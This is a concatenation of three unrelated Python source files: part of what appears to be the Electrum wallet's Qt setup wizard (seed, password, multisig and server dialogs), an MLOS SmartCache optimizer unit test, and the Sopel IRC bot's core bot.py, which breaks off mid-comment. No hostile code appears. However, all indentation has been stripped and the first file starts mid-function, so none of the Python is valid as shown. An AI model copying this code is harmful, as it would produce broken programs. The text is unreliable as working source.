if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
TestSmartCacheWithRemoteOptimizerV2.py | #
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
#
import logging
import os
from threading import Thread
import unittest
from mlos.Logger import create_logger
from mlos.Examples.SmartCache import SmartCacheWorkloadGenerator, SmartCache
from mlos.Examples.SmartCache.TelemetryAggregators.WorkingSetSizeEstimator import WorkingSetSizeEstimator
from mlos.MlosOptimizationServices.MlosOptimizationServicesProxy import MlosOptimizationServicesProxy
from mlos.MlosOptimizationServices.ModelsDatabase.ConnectionString import ConnectionString
from mlos.Mlos.Infrastructure import CommunicationChannel, SharedConfig
from mlos.Mlos.SDK import mlos_globals, MlosGlobalContext, MlosExperiment, MlosAgent
from mlos.Mlos.SDK.CommonAggregators.Timer import Timer
from mlos.Optimizers.DistributableSimpleBayesianOptimizer import DistributableSimpleBayesianOptimizer
from mlos.Optimizers.OptimizationProblem import OptimizationProblem, Objective
from mlos.Spaces import Point, SimpleHypergrid, ContinuousDimension
import mlos.global_values as global_values
class TestSmartCacheWithRemoteOptimizer(unittest.TestCase):
""" Tests SmartCache that's being tuned by the remote optimizer.
This test will:
1. Instantiate a SmartCache.
2. Create an MlosExperiment that connects to a remote or in-process optimizer.
3. Optimize the SmartCache with the help of the remote or in-process optimizer.
"""
def setUp(self):
mlos_globals.init_mlos_global_context()
mlos_globals.mlos_global_context.start_clock()
self.logger = create_logger('TestSmartCacheWithRemoteOptimizer')
self.logger.level = logging.INFO
self.mlos_agent = MlosAgent(
logger=self.logger,
communication_channel=mlos_globals.mlos_global_context.communication_channel,
shared_config=mlos_globals.mlos_global_context.shared_config,
)
self.mlos_agent_thread = Thread(target=self.mlos_agent.run)
self.mlos_agent_thread.start()
global_values.declare_singletons() # TODO: having both globals and global_values is a problem
self.workload_duration_s = 5
# Let's add the allowed component types
self.mlos_agent.add_allowed_component_type(SmartCache)
self.mlos_agent.add_allowed_component_type(SmartCacheWorkloadGenerator)
# Let's create the workload
self.smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.optimizer = None
self.working_set_size_estimator = WorkingSetSizeEstimator()
self.cache_config_timer = Timer(
timeout_ms=200,
observer_callback=self._set_new_cache_configuration
)
self.smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[self.cache_config_timer, self.working_set_size_estimator]
)
self.optimization_problem = OptimizationProblem(
parameter_space=SmartCache.parameter_search_space,
objective_space=SimpleHypergrid(name="objectives", dimensions=[
ContinuousDimension(name="miss_rate", min=0, max=1)
]),
context_space=None, # TODO: add working set size estimate
objectives=[Objective(name="miss_rate", minimize=True)]
)
def tearDown(self):
mlos_globals.mlos_global_context.stop_clock()
self.mlos_agent.stop_all()
@unittest.skip(reason="SQL Server is not available in GCI at the moment.")
def test_smart_cache_with_remote_optimizer_on_a_timer(self):
""" Periodically invokes the optimizer to improve cache performance.
"""
# Let's create an optimizer
connection_string = ConnectionString.create_from_config_file(os.path.abspath(os.path.join(os.getcwd(), "Secrets", "local_connection_string.json")))
global_values.ml_model_services_proxy = MlosOptimizationServicesProxy(models_database_connection_string=connection_string)
self.optimizer = DistributableSimpleBayesianOptimizer.create_remote_model(
models_database=global_values.ml_model_services_proxy.models_database,
optimization_problem=self.optimization_problem
)
TODO = """ There are so many things wrong here that an essay is in order.
1. The entire DistributableSimpleBayesianOptimizer is to be thrown out.
2. We need an Optimizer API that:
1. Will be standard across many types of optimizers.
2. Will let us specify:
1. The search space
2. The context space
3. The target values
We should generate client libraries along with MlosModelServices for Python and C# (at least). I suppose that's
the next task after this test is turned on.
"""
self.mlos_agent.start_experiment(self.smart_cache_experiment)
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=self.smart_cache_workload.run, args=(self.workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(self.smart_cache_experiment)
def test_smart_cache_with_in_process_optimizer_on_a_timer2(self):
""" Periodically invokes the optimizer to improve cache performance.
"""
# Let's create an optimizer
self.optimizer = DistributableSimpleBayesianOptimizer(
optimization_problem=self.optimization_problem
)
self.mlos_agent.start_experiment(self.smart_cache_experiment)
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=self.smart_cache_workload.run, args=(self.workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(self.smart_cache_experiment)
def _set_new_cache_configuration(self, elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = self.optimizer.suggest()
new_config_values = Point(**new_config_values) # TODO: this Point() should not be necessary here
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = self.working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
|
bot.py | # coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
from datetime import datetime
import itertools
import logging
import re
import sys
import threading
import time
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
from sopel.tools import Identifier, deprecated
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
import sopel.loader
__all__ = ['Sopel', 'SopelWrapper']
LOGGER = logging.getLogger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class Sopel(irc.AbstractBot):
def __init__(self, config, daemon=False):
super(Sopel, self).__init__(config)
self._daemon = daemon # Used for iPython. TODO something saner here
self.wantsrestart = False
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self._plugins = {}
self.doc = {}
"""A dictionary of command names to their documentation.
Each command is mapped to its docstring and any available examples, if
declared in the module's code.
.. versionchanged:: 3.2
Use the first item in each callable's commands list as the key,
instead of the function name as declared in the source code.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
A dictionary mapping lowercased nicks to dictionaries which map
function names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set.
"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels.
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead. Will be removed in Sopel 8.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are :class:`sopel.tools.Identifier`\\s of the channel names,
and map to :class:`sopel.tools.target.Channel` objects which contain
the users in the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are :class:`sopel.tools.Identifier`\\s of the nicknames, and
map to :class:`sopel.tools.target.User` instances. In order for Sopel
to be aware of a user, it must be in at least one channel which they
are also in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.SopelMemory`.
"""
self.shutdown_methods = []
"""List of methods to call on shutdown."""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
"""Job Scheduler. See :func:`sopel.module.interval`."""
# Set up block lists
# Default to empty
if not self.settings.core.nick_blocks:
self.settings.core.nick_blocks = []
if not self.settings.core.host_blocks:
self.settings.core.host_blocks = []
@property
def command_groups(self):
"""A mapping of module names to a list of commands in it."""
# This was supposed to be deprecated, but the help command uses this
return self._command_groups
@property
def hostmask(self):
"""The current hostmask for the bot :class:`sopel.tools.target.User`.
:return: the bot's current hostmask
:rtype: str
Bot must be connected and in at least one channel.
"""
if not self.users or self.nick not in self.users:
raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
return self.users.get(self.nick).hostmask
def setup(self):
"""Set up Sopel bot before it can run
The setup phase manages to:
* setup logging (configure Python's built-in :mod:`logging`),
* setup the bot's plugins (load, setup, and register)
* start the job scheduler
"""
self.setup_logging()
self.setup_plugins()
self.scheduler.start()
def setup_logging(self):
logger.setup_logging(self.settings)
base_level = self.settings.core.logging_level or 'INFO'
base_format = self.settings.core.logging_format
base_datefmt = self.settings.core.logging_datefmt
# configure channel logging if required by configuration
if self.settings.core.logging_channel:
channel_level = self.settings.core.logging_channel_level or base_level
channel_format = self.settings.core.logging_channel_format or base_format
channel_datefmt = self.settings.core.logging_channel_datefmt or base_datefmt
channel_params = {}
if channel_format:
channel_params['fmt'] = channel_format
if channel_datefmt:
channel_params['datefmt'] = channel_datefmt
formatter = logger.ChannelOutputFormatter(**channel_params)
handler = logger.IrcLoggingHandler(self, channel_level)
handler.setFormatter(formatter)
# set channel handler to `sopel` logger
LOGGER = logging.getLogger('sopel')
LOGGER.addHandler(handler)
def setup_plugins(self):
load_success = 0
load_error = 0
load_disabled = 0
LOGGER.info('Loading plugins...')
usable_plugins = plugins.get_usable_plugins(self.settings)
for name, info in usable_plugins.items():
plugin, is_enabled = info
if not is_enabled:
load_disabled = load_disabled + 1
continue
try:
plugin.load()
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error loading %s: %s', name, e)
else:
try:
if plugin.has_setup():
plugin.setup(self)
plugin.register(self)
except Exception as e:
load_error = load_error + 1
LOGGER.exception('Error in %s setup: %s', name, e)
else:
load_success = load_success + 1
LOGGER.info('Plugin loaded: %s', name)
total = sum([load_success, load_error, load_disabled])
if total and load_success:
LOGGER.info(
'Registered %d plugins, %d failed, %d disabled',
(load_success - 1),
load_error,
load_disabled)
else:
LOGGER.warning("Warning: Couldn't load any plugins")
def reload_plugin(self, name):
"""Reload a plugin
:param str name: name of the plugin to reload
:raise PluginNotRegistered: when there is no ``name`` plugin registered
It runs the plugin's shutdown routine and unregisters it. Then it
reloads it, runs its setup routines, and registers it again.
"""
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
plugin = self._plugins[name]
# tear down
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup
plugin.reload()
plugin.setup(self)
plugin.register(self)
LOGGER.info('Reloaded plugin %s', name)
def reload_plugins(self):
"""Reload all plugins
First, run all plugin shutdown routines and unregister all plugins.
Then reload all plugins, run their setup routines, and register them
again.
"""
registered = list(self._plugins.items())
# tear down all plugins
for name, plugin in registered:
plugin.shutdown(self)
plugin.unregister(self)
LOGGER.info('Unloaded plugin %s', name)
# reload & setup all plugins
for name, plugin in registered:
plugin.reload()
plugin.setup(self)
plugin.register(self)
LOGGER.info('Reloaded plugin %s', name)
def add_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Add a loaded plugin to the bot's registry"""
self._plugins[plugin.name] = plugin
self.register(callables, jobs, shutdowns, urls)
def remove_plugin(self, plugin, callables, jobs, shutdowns, urls):
"""Remove a loaded plugin from the bot's registry"""
name = plugin.name
if not self.has_plugin(name):
raise plugins.exceptions.PluginNotRegistered(name)
# remove commands, jobs, and shutdown functions
for func in itertools.chain(callables, jobs, shutdowns):
self.unregister(func)
# remove URL callback handlers
if "url_callbacks" in self.memory:
for func in urls:
regexes = func.url_regex
for regex in regexes:
if func == self.memory['url_callbacks'].get(regex):
self.unregister_url_callback(regex)
LOGGER.debug('URL Callback unregistered: %r', regex)
# remove plugin from registry
del self._plugins[name]
def has_plugin(self, name):
"""Tell if the bot has registered this plugin by its name"""
return name in self._plugins
def unregister(self, obj):
"""Unregister a callable.
:param obj: the callable to unregister
:type obj: :term:`object`
"""
if not callable(obj):
LOGGER.warning('Cannot unregister obj %r: not a callable', obj)
return
callable_name = getattr(obj, "__name__", 'UNKNOWN')
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
LOGGER.debug(
'Rule callable "%s" unregistered',
callable_name,
rule.pattern)
if hasattr(obj, 'interval'):
self.scheduler.remove_callable_job(obj)
LOGGER.debug('Job callable removed: %s', callable_name)
if callable_name == "shutdown" and obj in self.shutdown_methods:
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
"""Register rules, jobs, shutdown methods, and URL callbacks.
:param callables: an iterable of callables to register
:type callables: :term:`iterable`
:param jobs: an iterable of functions to periodically invoke
:type jobs: :term:`iterable`
:param shutdowns: an iterable of functions to call on shutdown
:type shutdowns: :term:`iterable`
:param urls: an iterable of functions to call when matched against a URL
:type urls: :term:`iterable`
The ``callables`` argument contains a list of "callable objects", i.e.
objects for which :func:`callable` will return ``True``. They can be:
* a callable with rules (will match triggers with a regex pattern)
* a callable without rules (will match any triggers, such as events)
* a callable with commands
* a callable with nick commands
* a callable with action commands
It is possible to have a callable with rules, commands, and nick
commands configured. It should not be possible to have a callable with
commands or nick commands but without rules. Callables without rules
are usually event handlers.
"""
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
match_any = re.compile('.*')
for callbl in callables:
callable_name = getattr(callbl, "__name__", 'UNKNOWN')
rules = getattr(callbl, 'rule', [])
commands = getattr(callbl, 'commands', [])
nick_commands = getattr(callbl, 'nickname_commands', [])
action_commands = getattr(callbl, 'action_commands', [])
events = getattr(callbl, 'event', [])
is_rule_only = rules and not commands and not nick_commands
if rules:
for rule in rules:
self._callables[callbl.priority][rule].append(callbl)
if is_rule_only:
# Command & Nick Command are logged later:
# here we log rule only callable
LOGGER.debug(
'Rule callable "%s" registered for "%s"',
callable_name,
rule.pattern)
if commands:
LOGGER.debug(
'Command callable "%s" registered for "%s"',
callable_name,
'|'.join(commands))
if nick_commands:
LOGGER.debug(
'Nick command callable "%s" registered for "%s"',
callable_name,
'|'.join(nick_commands))
if action_commands:
LOGGER.debug(
'Action command callable "%s" registered for "%s"',
callable_name,
'|'.join(action_commands))
if events:
LOGGER.debug(
'Event callable "%s" registered for "%s"',
callable_name,
'|'.join(events))
else:
self._callables[callbl.priority][match_any].append(callbl)
if events:
LOGGER.debug(
'Event callable "%s" registered '
'with "match any" rule for "%s"',
callable_name,
'|'.join(events))
else:
LOGGER.debug(
'Rule callable "%s" registered with "match any" rule',
callable_name)
if commands:
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'Job added "%s", will run every %d seconds',
callable_name,
interval)
for func in urls:
for regex in func.url_regex:
self.register_url_callback(regex, func)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'URL Callback added "%s" for URL pattern "%s"',
callable_name,
regex)
@deprecated
def msg(self, recipient, text, max_messages=1):
"""
.. deprecated:: 6.0
Use :meth:`say` instead. Will be removed in Sopel 8.
"""
self.say(text, recipient, max_messages)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate-limiting or restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded modules/modules methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed modules completely on provided channel
if 'disable_modules' in channel_config:
disabled_modules = channel_config.disable_modules.split(',')
# if "*" is used, we are disabling all modules on provided channel
if '*' in disabled_modules:
return
if func.__module__ in disabled_modules:
return
# disable chosen methods from modules
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.__module__ in disabled_commands:
if func.__name__ in disabled_commands[func.__module__]:
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param PreTrigger pretrigger: a parsed message from the server
"""
args = pretrigger.args
text = args[-1] if args else ''
event = pretrigger.event
intent = pretrigger.tags.get('intent')
nick = pretrigger.nick
is_echo_message = nick.lower() == self.nick.lower()
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
for regexp, funcs in self._callables[priority].items():
match = regexp.match(text)
if not match:
continue
for func in funcs:
trigger = Trigger(self.config, pretrigger, match, account)
# check event
if event not in func.event:
continue
# check intents
if hasattr(func, 'intents'):
if not intent:
continue
match = any(
func_intent.match(intent)
for func_intent in func.intents
)
if not match:
continue
# check echo-message feature
if is_echo_message and not func.echo:
continue
# check blocked nick/host
# done after we know the trigger would have matched so we
# don't spam logs with "prevented from using" entries about
